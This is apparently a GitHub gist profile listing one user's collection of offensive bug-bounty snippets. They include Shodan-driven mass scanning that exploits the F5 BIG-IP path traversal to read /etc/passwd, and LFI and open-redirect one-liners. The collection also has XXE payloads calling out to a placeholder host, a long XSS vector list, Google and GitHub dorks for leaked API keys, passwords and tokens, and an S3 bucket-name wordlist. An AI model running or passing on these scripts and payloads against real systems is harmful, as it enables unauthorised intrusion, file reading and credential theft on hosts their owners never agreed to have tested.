Skip to content

Instantly share code, notes, and snippets.

View ravkishu's full-sized avatar
:octocat:
On vacation

Mr RK ravkishu

:octocat:
On vacation
3 followers · 2 following
View GitHub Profile
@ravkishu
ravkishu / byp4xx.sh
Created February 7, 2021 14:09
Simple bash script to bypass "403 Forbidden" messages with well-known methods discussed in #bugbountytips
#!/bin/bash
# Credits: https://github.com/lobuhi/byp4xx
#INTRO
echo -e "\e[1m\e[32m __ \e[1m\e[31m__ __ "
echo -e "\e[1m\e[32m / /_ __ ______ \e[1m\e[31m/ // / _ ___ __"
echo -e "\e[1m\e[32m / __ \/ / / / __ \ \e[1m\e[31m/ // /_| |/_/ |/_/"
echo -e "\e[1m\e[32m / /_/ / /_/ / /_/ /\e[1m\e[31m/__ __/> <_> < "
echo -e "\e[1m\e[32m/_.___/\__, / .___/ \e[1m\e[31m/_/ /_/|_/_/|_| "
echo -e "\e[1m\e[32m /____/_/ "
@ravkishu
ravkishu / common_bucket.txt
Last active October 8, 2020 20:59
aws s3 bucket | prefixes | enumeration | names | mutations
1
10
11
12
13
14
15
16
17
18
@ravkishu
ravkishu / waybackrobots.py
Created September 24, 2020 14:12 — forked from mhmdiaa/waybackrobots.py
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@ravkishu
ravkishu / github-recon
Created September 22, 2020 16:30 — forked from pikpikcu/github-recon
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https:// 
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@ravkishu
ravkishu / dork
Created September 22, 2020 15:33 — forked from pikpikcu/dork
for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done
@ravkishu
ravkishu / bash_aliases.sh
Created September 22, 2020 15:02 — forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
@ravkishu
ravkishu / rce.sh
Created September 17, 2020 10:12 — forked from Mad-robot/rce.sh
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
@ravkishu
ravkishu / xxe-payloads.txt
Created September 15, 2020 14:32 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@ravkishu
ravkishu / gist:1028500db79c6e91e0861eab8d8c7711
Created September 15, 2020 14:31 — forked from sempf/gist:f44714afe0050b83b6e647261d53b43e
666 XSS Vectors collected from the web
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@ravkishu
ravkishu / WinGitDork.sh
Created September 12, 2020 13:36
GitHub Droking Script Windows Git
#!/bin/bash
FILE=./GitHubDorking.sh
if [ -f "$FILE" ]; then
echo "$FILE file exists."
else
wget "https://gist.github.com/ravkishu/d0c8d095ef58d649af136f07b8a8626c/raw/e211d8ec3ca94035ded3163ea1a80c7b3f0fb574/GitHubDorking.sh"
fi
chmod +x GitHubDorking.sh